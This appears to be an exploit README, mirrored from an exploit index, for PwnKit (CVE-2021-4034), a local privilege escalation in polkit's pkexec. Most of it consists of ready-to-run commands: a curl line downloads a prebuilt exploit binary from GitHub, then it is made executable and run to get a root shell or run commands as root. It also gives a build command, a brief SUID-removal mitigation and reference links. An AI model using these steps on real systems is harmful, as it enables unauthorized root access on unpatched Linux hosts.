Share
## https://sploitus.com/exploit?id=7C600E50-B6A9-5CD1-90DE-726205482F77
# PwnKit

PoC for PwnKit / CVE-2021-4034 - Pkexec Local Privilege Escalation

## Exploit
### Manually

```bash
curl -fsSL https://raw.githubusercontent.com/jayhutajulu1/PwnKit-CVE-2021-4034/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command
```

### Patched

Running the exploit against patched versions will yield the following output.

### Build

```bash
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
```

### Mitigation

If no patches are available for your operating system, you can remove the SUID-bit from pkexec as a temporary mitigation.

```bash
# chmod 0755 /usr/bin/pkexec
```

## Technical Details

- https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

## References

- https://github.com/arthepsy/CVE-2021-4034/